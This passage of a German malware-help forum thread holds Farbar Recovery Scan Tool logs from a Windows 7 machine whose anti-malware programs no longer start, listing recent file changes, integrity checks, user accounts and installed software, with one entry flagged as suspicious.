2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 08:12 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\netbtugc.exe
2017-09-14 23:01 - 2017-08-11 08:09 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.exe
2017-09-14 23:01 - 2017-08-11 08:07 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-09-14 23:01 - 2017-08-11 08:07 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-09-14 23:01 - 2017-08-11 08:07 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-09-14 23:01 - 2017-08-11 08:06 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-09-14 23:01 - 2017-08-11 08:03 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-09-14 23:01 - 2017-08-11 08:03 - 000026624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netbtugc.exe
2017-09-14 23:01 - 2017-08-11 08:02 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-09-14 23:01 - 2017-08-11 08:01 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comcat.dll
2017-09-14 23:01 - 2017-08-11 08:00 - 000262656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2017-09-14 23:01 - 2017-08-11 08:00 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-09-14 23:01 - 2017-08-11 08:00 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-09-14 23:01 - 2017-08-11 07:59 - 000460800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-09-14 23:01 - 2017-08-11 07:59 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-09-14 23:01 - 2017-08-11 07:59 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-09-14 23:01 - 2017-08-11 07:59 - 000168448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-09-14 23:01 - 2017-08-11 07:59 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-09-14 23:01 - 2017-08-11 07:58 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-09-14 23:01 - 2017-08-11 07:58 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-09-14 23:01 - 2017-08-11 07:58 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nsiproxy.sys
2017-09-14 23:01 - 2017-08-11 07:56 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-09-14 23:01 - 2017-08-11 07:56 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-09-14 23:01 - 2017-08-11 07:56 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-09-14 23:01 - 2017-08-11 07:56 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-09-14 23:01 - 2017-08-11 07:55 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-09-14 23:01 - 2017-08-11 07:55 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 07:55 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 07:55 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-09-14 23:01 - 2017-08-11 07:55 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-09-14 23:01 - 2017-07-07 17:29 - 001143296 _____ (Microsoft Corporation) C:\Windows\system32\DXPTaskRingtone.dll
2017-09-14 23:01 - 2017-07-07 17:10 - 000973312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXPTaskRingtone.dll
2017-09-14 09:58 - 2017-09-14 09:58 - 002270423 _____ C:\Users\xxxxxx\Downloads\M-PESA_API_Guide_download.zip
2017-09-06 09:47 - 2017-09-06 09:47 - 000073935 _____ C:\Users\xxxxxx\Downloads\FBQW2D(1).pdf
2017-09-06 09:42 - 2017-09-06 09:42 - 000073789 _____ C:\Users\xxxxxx\Downloads\FBQW2D.pdf
2017-09-05 13:51 - 2017-09-05 13:51 - 000241354 _____ C:\Users\xxxxxx\Downloads\d3.zip
2017-09-05 08:43 - 2017-09-05 08:43 - 000003346 _____ C:\Users\xxxxxx\Downloads\composer.json
2017-09-04 14:37 - 2017-09-04 14:38 - 025405251 _____ C:\Users\xxxxxx\Downloads\typo3_src-7.6.21.zip
2017-09-04 14:19 - 2017-09-04 14:19 - 007671107 _____ C:\Users\xxxxxx\Downloads\extension_builder_7.6.18.t3x
2017-09-04 13:55 - 2017-09-04 13:55 - 010130247 _____ C:\Users\xxxxxx\Downloads\extension_builder_7.6.18.zip
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-10-03 22:16 - 2015-06-22 10:47 - 000000000 ____D C:\FRST
2017-10-03 22:13 - 2014-12-24 09:55 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2017-10-03 22:13 - 2014-12-24 09:50 - 000000000 ____D C:\ProgramData\Validity
2017-10-03 22:13 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-10-03 22:10 - 2009-07-14 06:45 - 000034208 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-10-03 22:10 - 2009-07-14 06:45 - 000034208 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-10-03 22:09 - 2016-11-18 11:39 - 000000000 ____D C:\Users\xxxxxx\AppData\LocalLow\Mozilla
2017-10-03 22:08 - 2015-05-16 10:04 - 000000000 ____D C:\Users\xxxxxx\Documents\Youcam
2017-10-03 22:06 - 2009-07-14 07:08 - 000032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-10-03 22:02 - 2015-05-16 10:04 - 000003942 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{DE89F5BE-B625-4BF6-8A72-C7870ECC6155}
2017-10-03 16:13 - 2014-04-24 14:50 - 000703340 _____ C:\Windows\system32\perfh007.dat
2017-10-03 16:13 - 2014-04-24 14:50 - 000150952 _____ C:\Windows\system32\perfc007.dat
2017-10-03 16:13 - 2009-07-14 07:13 - 001625524 _____ C:\Windows\system32\PerfStringBackup.INI
2017-10-03 16:13 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf
2017-10-03 16:11 - 2016-02-24 23:53 - 000000546 _____ C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1772142865-3804567698-3626976838-1001.job
2017-10-03 16:06 - 2016-02-24 23:53 - 000000642 _____ C:\Windows\Tasks\G2MUploadTask-S-1-5-21-1772142865-3804567698-3626976838-1001.job
2017-10-01 22:15 - 2015-05-16 11:25 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-10-01 20:02 - 2015-09-01 15:06 - 000000340 _____ C:\Windows\Tasks\HPCeeScheduleForxxxxxx.job
2017-10-01 20:02 - 2015-05-16 11:23 - 000000000 ____D C:\projects
2017-10-01 20:01 - 2015-05-16 10:01 - 000000000 ____D C:\Users\xxxxxx
2017-10-01 19:31 - 2015-07-22 13:09 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\ElevatedDiagnostics
2017-10-01 17:19 - 2015-09-01 15:06 - 000003198 _____ C:\Windows\System32\Tasks\HPCeeScheduleForxxxxxx
2017-10-01 10:20 - 2017-07-09 14:50 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\GoToMeeting
2017-10-01 10:20 - 2016-02-24 23:53 - 000003674 _____ C:\Windows\System32\Tasks\G2MUploadTask-S-1-5-21-1772142865-3804567698-3626976838-1001
2017-10-01 10:20 - 2016-02-24 23:53 - 000003578 _____ C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-1772142865-3804567698-3626976838-1001
2017-09-29 18:13 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2017-09-29 10:52 - 2017-08-06 01:49 - 000000000 ____D C:\Users\xxxxxx\Desktop\laravel-vue-backend
2017-09-27 12:17 - 2016-09-28 17:03 - 000000000 ____D C:\Users\xxxxxx\.p2
2017-09-27 12:16 - 2015-05-16 12:21 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\Eclipse
2017-09-26 21:09 - 2015-05-17 22:30 - 000002187 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-09-26 10:34 - 2016-05-23 18:07 - 000000000 ____D C:\Users\xxxxxx\Desktop\artue-loiesung-sql
2017-09-25 14:53 - 2016-11-01 12:40 - 000002248 ____H C:\Users\xxxxxx\Documents\Default.rdp
2017-09-25 14:42 - 2015-05-16 11:04 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\Skype
2017-09-22 15:18 - 2015-09-23 10:44 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\VisualParadigm
2017-09-22 15:09 - 2016-03-30 01:25 - 000000000 ___RD C:\Program Files (x86)\Skype
2017-09-22 15:09 - 2014-04-24 08:02 - 000000000 ____D C:\ProgramData\Skype
2017-09-22 11:19 - 2015-08-20 16:51 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\NetSpeedMonitor
2017-09-21 15:02 - 2017-07-25 00:22 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\npm-cache
2017-09-20 20:19 - 2017-05-31 19:56 - 000001024 _____ C:\Users\xxxxxx\.rnd
2017-09-20 11:36 - 2017-01-07 10:41 - 000000695 _____ C:\Users\xxxxxx\Desktop\myBusiness-TODO.txt
2017-09-20 09:54 - 2017-02-28 19:59 - 000000773 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 12.lnk
2017-09-19 11:52 - 2009-07-14 04:34 - 000000612 _____ C:\Windows\win.ini
2017-09-19 09:09 - 2015-05-16 12:52 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\CrashDumps
2017-09-17 10:09 - 2017-08-28 09:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2017-09-17 10:09 - 2017-08-28 09:32 - 000000000 ____D C:\Program Files\Microsoft VS Code
2017-09-17 10:09 - 2016-05-26 18:54 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\Code
2017-09-15 20:02 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\rescache
2017-09-15 08:49 - 2015-05-16 10:04 - 000000000 ___RD C:\Users\xxxxxx\Virtual Machines
2017-09-15 08:48 - 2009-07-14 06:45 - 000441208 _____ C:\Windows\system32\FNTCACHE.DAT
2017-09-14 23:07 - 2014-04-24 07:54 - 001603548 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2017-09-14 14:04 - 2015-05-16 12:06 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\FileZilla
2017-09-13 10:59 - 2015-06-16 23:29 - 000004366 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-09-13 10:59 - 2014-04-24 07:58 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-09-13 10:59 - 2014-04-24 07:58 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-09-13 10:59 - 2014-04-24 07:58 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2017-09-13 10:59 - 2014-04-24 07:58 - 000000000 ____D C:\Windows\system32\Macromed
2017-09-08 11:07 - 2016-05-26 20:42 - 000000000 _____ C:\Users\xxxxxx\.node_repl_history
2017-09-07 12:37 - 2017-08-17 01:54 - 000000000 ____D C:\Users\xxxxxx\Desktop\vue-laravel-frontend
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2015-10-18 10:42 - 2015-10-18 10:43 - 000000411 _____ () C:\Users\xxxxxx\AppData\Roaming\javascriptobfuscator.jsop
2015-05-16 10:02 - 2016-02-12 10:57 - 003309262 _____ () C:\Users\xxxxxx\AppData\Local\BTServer.log
2017-08-05 11:51 - 2017-08-05 11:51 - 000000600 _____ () C:\Users\xxxxxx\AppData\Local\PUTTY.RND
2016-10-09 16:21 - 2016-10-09 16:21 - 000007606 _____ () C:\Users\xxxxxx\AppData\Local\Resmon.ResmonCfg
Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\Users\xxxxxx\.mongorc.js
C:\Users\xxxxxx\ntuserdirect_MyManager.dat
Einige Dateien in TEMP:
====================
2015-07-17 04:04 - 2015-07-29 01:41 - 000000000 ____D () C:\Users\xxxxxx\AppData\Local\Temp\DllMonoCtrl.dll
2015-06-25 07:53 - 2015-06-25 07:53 - 000026936 _____ (TuneUp Software) C:\Users\xxxxxx\AppData\Local\Temp\DseShExt-x64.dll
2015-06-25 07:53 - 2015-06-25 07:53 - 000028984 _____ (TuneUp Software) C:\Users\xxxxxx\AppData\Local\Temp\DseShExt-x86.dll
2015-07-15 11:19 - 2015-07-15 11:23 - 019062208 _____ (Disc Soft Ltd) C:\Users\xxxxxx\AppData\Local\Temp\DTLite1010-0074.exe
2017-04-22 10:05 - 2017-04-22 10:05 - 000035680 _____ () C:\Users\xxxxxx\AppData\Local\Temp\i4jdel0.exe
2015-07-21 11:28 - 2015-07-21 11:28 - 000563808 _____ (Oracle Corporation) C:\Users\xxxxxx\AppData\Local\Temp\jre-8u51-windows-au.exe
2015-10-28 11:01 - 2015-10-28 11:01 - 000585824 _____ (Oracle Corporation) C:\Users\xxxxxx\AppData\Local\Temp\jre-8u65-windows-au.exe
2015-07-03 10:23 - 2015-07-03 10:23 - 007000049 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.6.7.9.2.Installer.exe
2015-12-24 17:15 - 2015-12-24 17:15 - 004121418 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.6.8.8.Installer.exe
2016-11-09 11:36 - 2016-11-09 11:36 - 002842320 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.1.Installer.exe
2017-01-11 10:33 - 2017-01-11 10:33 - 002858376 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.2.2.Installer.exe
2017-03-14 10:36 - 2017-03-14 10:36 - 002903480 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.3.2.Installer.exe
2017-04-13 10:58 - 2017-04-13 10:58 - 002982992 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.3.3.Installer.exe
2017-05-29 10:37 - 2017-05-29 10:38 - 002990616 _____ () C:\Users\xxxxxx\AppData\Local\Temp\npp.7.4.1.Installer.exe
2015-06-25 07:53 - 2015-06-25 07:53 - 000032568 _____ (TuneUp Software) C:\Users\xxxxxx\AppData\Local\Temp\SDShelEx-win32.dll
2015-06-25 07:53 - 2015-06-25 07:53 - 000032056 _____ (TuneUp Software) C:\Users\xxxxxx\AppData\Local\Temp\SDShelEx-x64.dll
2015-10-06 14:29 - 2017-05-29 08:30 - 058128344 _____ (Skype Technologies S.A.) C:\Users\xxxxxx\AppData\Local\Temp\SkypeSetup.exe
2015-09-23 10:45 - 2015-09-23 10:45 - 000721920 _____ () C:\Users\xxxxxx\AppData\Local\Temp\sqlite-3.8.6-amd64-sqlitejdbc.dll
2015-08-03 01:58 - 2015-08-03 01:58 - 000118784 _____ () C:\Users\xxxxxx\AppData\Local\Temp\xmlUpdater.exe
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\Windows\system32\winlogon.exe => MD5 ist legitim
C:\Windows\system32\wininit.exe => MD5 ist legitim
C:\Windows\SysWOW64\wininit.exe => MD5 ist legitim
C:\Windows\explorer.exe => MD5 ist legitim
C:\Windows\SysWOW64\explorer.exe => MD5 ist legitim
C:\Windows\system32\svchost.exe => MD5 ist legitim
C:\Windows\SysWOW64\svchost.exe => MD5 ist legitim
C:\Windows\system32\services.exe => MD5 ist legitim
C:\Windows\system32\User32.dll => MD5 ist legitim
C:\Windows\SysWOW64\User32.dll => MD5 ist legitim
C:\Windows\system32\userinit.exe => MD5 ist legitim
C:\Windows\SysWOW64\userinit.exe => MD5 ist legitim
C:\Windows\system32\rpcss.dll
[2017-09-14 23:01] - [2017-08-11 08:35] - 000512000 _____ (Microsoft Corporation) 3F1A199859B4F3F8357B2A0AF5666A54
C:\Windows\system32\dnsapi.dll => MD5 ist legitim
C:\Windows\SysWOW64\dnsapi.dll => MD5 ist legitim
C:\Windows\system32\Drivers\volsnap.sys => MD5 ist legitim
LastRegBack: 2017-09-21 19:46
==================== Ende von FRST.txt ============================
|
|
03.10.2017, 22:31
| #14 |
| | Anti Malware Programme lassen sich nicht mehr starten und das additions.txt windows username wurde jeweils durch 'xxxxxx' ersetzt. FRST Additions Logfile: Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-10-2017 01
durchgeführt von xxxxxx (03-10-2017 22:22:20)
Gestartet von F:\
Windows 7 Professional Service Pack 1 (X64) (2015-05-16 08:01:46)
Start-Modus: Safe Mode (minimal)
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1772142865-3804567698-3626976838-500 - Administrator - Disabled)
Gast (S-1-5-21-1772142865-3804567698-3626976838-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1772142865-3804567698-3626976838-1002 - Limited - Enabled)
xxxxxx (S-1-5-21-1772142865-3804567698-3626976838-1001 - Administrator - Enabled) => C:\Users\xxxxxx
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
7-Zip 15.14 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1514-000001000000}) (Version: 15.14.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.012.20098 - Adobe Systems Incorporated)
Adobe Flash Player 27 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 27.0.0.130 - Adobe Systems Incorporated)
Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.130 - Adobe Systems Incorporated)
Adobe Photoshop 7.0 (HKLM-x32\...\Adobe Photoshop 7.0) (Version: 7.0 - Adobe Systems, Inc.)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.4.194 - Adobe Systems, Inc.)
Android Studio (HKLM\...\Android Studio) (Version: 1.0 - Google Inc.)
Apache Tomcat 8.0.27 (HKLM\...\nbi-tomcat-8.0.27.0.0) (Version: - )
Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{0E4C791E-B78E-477D-BD5A-CDD0985BA6EC}) (Version: 7.0.20622.1 - Microsoft Corporation)
Atom (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\atom) (Version: 1.18.0 - GitHub Inc.)
Azure AD Authentication Connected Service (HKLM-x32\...\{8A1AD070-269F-4A15-AAB5-76AB896EF195}) (Version: 14.0.25420 - Microsoft Corporation) Hidden
AzureTools.Notifications (HKLM-x32\...\{1E5CA362-39B6-4BD0-B9C0-69CF15F0FEA2}) (Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
BitMeter (HKLM-x32\...\BitMeter) (Version: - )
Blend for Visual Studio SDK for .NET 4.5 (HKLM-x32\...\{37E53780-3944-4A6A-842F-727128E8616E}) (Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blisk (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\Blisk) (Version: 0.61.2743.166 - Blisk)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.320.8504 - BlueStack Systems, Inc.)
Bullzip MS Access to MySQL 5.3.0.259 (HKLM-x32\...\Bullzip MS Access to MySQL_is1) (Version: - Bullzip)
chip 1-click download service (HKLM-x32\...\{503CA94E-0834-4CEE-AD92-BA17AF4E809A}) (Version: 3.6.9.0 - Chip Digital GmbH)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Citrix Online Launcher (HKLM-x32\...\{09DA5EE2-7E46-4DC4-96F9-BFEE50D40659}) (Version: 1.0.408 - Citrix)
ColorPic (HKLM-x32\...\ColorPic) (Version: 4.1 - Iconico)
Composer - Php Dependency Manager (HKLM-x32\...\{7315AF68-E777-496A-A6A2-4763A98ED35A}_is1) (Version: - getcomposer.org)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.6.7225 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.6.3821 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.3.3907 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Desktop-Wecker (HKLM-x32\...\{1DC996A1-B1D1-46C5-B8C9-A936E7649329}) (Version: 1.0.0 - ROBL - PC - WARE)
Docker Toolbox version 1.12.0 (HKLM\...\{FC4417F0-D7F3-48DB-BCE1-F5ED5BAFFD91}_is1) (Version: 1.12.0 - Docker)
Dotfuscator and Analytics Community Edition 5.22.0 (HKLM-x32\...\{60018889-9E0F-43E8-9B89-29E8C828B40A}) (Version: 5.22.0.3788 - PreEmptive Solutions) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E1ACF120-CD69-47F0-B202-9A4B95C436D8}) (Version: 5.1.5 - Hewlett-Packard)
FileZilla Client 3.25.0 (HKLM-x32\...\FileZilla Client) (Version: 3.25.0 - Tim Kosse)
Finale NotePad 2012 (HKLM-x32\...\Finale NotePad 2012) (Version: 2012..r1.1 - MakeMusic)
Fotogalerie (HKLM-x32\...\{41BF4A3B-D60A-4E92-883F-C88C8C157261}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
FreeCAD 0.16 - A free open source CAD system (HKLM-x32\...\FreeCAD 0.16) (Version: 0.16.6700 - Juergen Riegel)
Git version 2.9.0 (HKLM\...\Git_is1) (Version: 2.9.0 - The Git Development Community)
GlassFish Server Open Source Edition 4.1.1 (HKLM\...\nbi-glassfish-mod-4.1.1.0.1) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 61.0.3163.100 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
GoToMeeting 8.14.0.7716 (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\GoToMeeting) (Version: 8.14.0.7716 - LogMeIn, Inc.)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
Hewlett-Packard ACLM.NET v1.2.2.3 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP 3D DriveGuard (HKLM-x32\...\{D34A4D8B-B553-4A4D-A029-5B4F8F66C236}) (Version: 6.0.17.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{E2C8D0C2-1C97-4C05-939A-5B13A0FE655C}) (Version: 2.20.31 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{C178F0A7-86C8-4BE0-8401-3BC4F6E12F81}) (Version: 1.3.0.0 - Hewlett-Packard)
HP On Screen Display (HKLM-x32\...\{BB83BE06-E69A-4CC5-8421-96CCD196589E}) (Version: 1.3.6 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company)
HP Security Assistant (HKLM\...\{ED6CD3AC-616B-4B20-BCF3-6E637B92A5AD}) (Version: 3.0.4 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15453.4066 - Hewlett-Packard Company)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{4CA5FA45-36D1-4351-ADA1-9C87625F1D51}) (Version: 4.6.13.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{8C696B4B-6AB1-44BC-9416-96EAC474CABE}) (Version: 7.5.2.12 - Hewlett-Packard Company)
Inst5675 (HKLM\...\{2DE6247C-7077-451B-8BA7-FFD1A2ABBB47}) (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (HKLM\...\{878F6913-7421-4713-97F7-0A736EE2A188}) (Version: 8.01.11 - Softex Inc.) Hidden
Java 7 Update 80 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417080FF}) (Version: 7.0.800 - Oracle)
Java 8 Update 65 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Java SE Development Kit 7 Update 79 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170790}) (Version: 1.7.0.790 - Oracle)
Java SE Development Kit 8 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180450}) (Version: 8.0.450.15 - Oracle Corporation)
Java(TM) 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle)
Java(TM) SE Development Kit 6 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0160450}) (Version: 1.6.0.450 - Oracle)
JetBrains PhpStorm 7.1.5 (HKLM-x32\...\PhpStorm 7.1.5) (Version: 133.1886 - JetBrains s.r.o.)
Line 6 Uninstaller (HKLM-x32\...\Line 6 Uninstaller) (Version: - Line 6)
LockHunter 3.1, 32/64 bit (HKLM\...\LockHunter_is1) (Version: - Crystal Rich Ltd)
Magnifying Glass 1.1 (HKLM-x32\...\Magnifying Glass_is1) (Version: - )
MaintenanceService 1.0.0 (HKLM-x32\...\zz.437.mcc) (Version: 1.0.0 - CSDI) <==== ACHTUNG
Microsoft – Speichern als PDF oder XPS – Add-In für 2007 Microsoft Office-Programme (HKLM-x32\...\{90120000-00B2-0407-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
